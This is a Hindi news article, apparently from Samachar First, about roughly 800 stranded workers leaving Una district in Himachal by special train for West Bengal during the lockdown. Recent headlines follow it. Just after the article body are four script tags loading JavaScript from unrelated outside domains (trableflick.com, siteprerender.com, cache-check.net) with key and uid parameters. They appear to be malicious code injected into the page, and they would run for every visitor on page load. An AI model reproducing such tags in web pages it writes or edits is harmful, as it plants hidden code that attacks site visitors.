Categories: हिमाचल

हिमाचल में फंसे 800 यात्री ट्रेन से हुए वेस्ट बंगाल रवाना

<p>लॉकड़ाऊन के बीच जहां बाहरी राज्यों से हिमाचलियों को लेकर सात विशेष ट्रेन जिला ऊना में पहुंची थी। वहीं शनिवार शाम बाहरी राज्यों के लोगों को लेकर पहली विशेष ट्रेन वेस्ट बंगाल के लिए रवाना हुई। ठीक 6 बजे श्रमिक ट्रेन जिला ऊना के अंब अंदौरा रेलवे स्टेशन से करीब 800 यात्रियों को लेकर पश्चिम बंगाल के लिए रवाना हुई। 11 स्टेशनों से होती हुई यह ट्रेन रविवार रात 11 बजकर 30 मिनट पर हावडा पहुंचेगी। वहीं लंबे समय से घर वापिसी का इंतजार कर रहे लोग ट्रेन में बैठकर खुशी का अनुभव कर रहे थे।</p>

<p>पश्चिम बंगाल के लिए ट्रेन रवाना होने से पहले जिला प्रशासन ऊना ने सभी यात्रियों को खाने के पैकेट और पानी की बोतलें प्रदान की। अंब स्टेशन से ट्रेन के छूटते ही सभी अधिकारियों और स्टॉफ ने यात्रियों का तालियां बजाकर हौंसला बढ़ाया। इस दौरान उपायुक्त ऊना संदीप कुमार, एडीसी अरिंदम चौधरी, एएसपी विनोद कुमार सहित अन्य अधिकारी उपस्थित रहे। रवाना होने से पहले सभी यात्रियों की थर्मल स्कैनिंग की गई। अंब-अंदौरा से ट्रेन के पहिए घूमने के साथ ही पहले कोच से लेकर आखिरी कोच तक बैठे सभी यात्रियों के मुंह पर एक ही शब्द था थैक्सू सर।</p>

<p>ट्रेन के चलते ही यात्री कोच के गेट पर आकर जिला प्रशासन का आभार जताते हुए तालियां बजाते हुए धन्यावाद करते रहे। इतना ही नहीं कोच के अंदर बैठे यात्री भी जिला प्रशासन को दुआएं देते नजर आए। हर यात्री रवाना होने से पहले बाय करते हुए निकले। पश्चिम बंगाल जाने वाले यात्रियों ने बताया कि वो लॉकडाउन के कारण जहां फंसे थे और इस दौरान हिमाचल में उन्हें बेहतर सुविधाएं मिली। वहीं, डीसी ऊना संदीप कुमार ने बताया कि यात्रियों की अंब अंदौरा रेलवे स्टेशन पर थर्मल स्क्रीनिंग की गई और इन्हे खाने के पैकेट भी दिए गए। डीसी ऊना ने बताया कि जिला प्रशासन द्वारा ऊना से उत्तर प्रदेश के लिए भी एक ट्रेन प्लान की जा रही है।<br />
&nbsp;</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1591508510512″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

रेणुका विधानसभा क्षेत्र को उप मुख्यमंत्री का तोहफा, 2.40 करोड़ के विकास कार्यों का शुभारंभ

नाहन। उप मुख्यमंत्री मुकेश अग्निहोत्री ने आज जिला सिरमौर के श्री रेणुका जी विधान सभा…

9 hours ago

जानें कौन सी योजना देगी 1% ब्याज पर 20 लाख का शिक्षा ऋण

  Shimla: डॉ. वाईएस परमार ऋण योजना को सुक्‍खू सरकार ने विस्‍तार दिया है। योजना…

10 hours ago

28 सितंबर को शांतिपूर्ण प्रदर्शन, फैसला न आने पर जेल भरो आंदोलन

  Shimla: संजौली अवैध मस्जिद विवाद शांत नहीं हुआ है। 28 सितंबर को देवभूमि संघर्ष…

10 hours ago

कंगना का कांग्रेस पर करारा वार: कांग्रेस को बच्चे पालने का शौक, पप्पू और बहन की हरकतें बचकानी

  Mandi: मंडी के गोहर में एक कार्यक्रम में सांसद कंगना ने कांग्रेस के शीर्ष…

11 hours ago

पीएम मोदी कर रहे बदनाम, हिमाचलआर्थिक तंगी से नहीं जूझ रहा: डिप्टी सीएम

  Sirmour: उपमुख्यमंत्री मुकेश अग्निहोत्री ने आरोप लगाया है कि भाजपा के केंद्रीय व प्रदेश…

11 hours ago

स्वच्छ रहेगा घर, नगर व पंचायत तभी तो स्वस्थ रहेगा इंसान: उषा बिरला

  Hamirpur: ग्राम पंचायत दडूही में सोमवार को स्वच्छ भारत मिशन के तहत स्वच्छता पखवाड़ा…

12 hours ago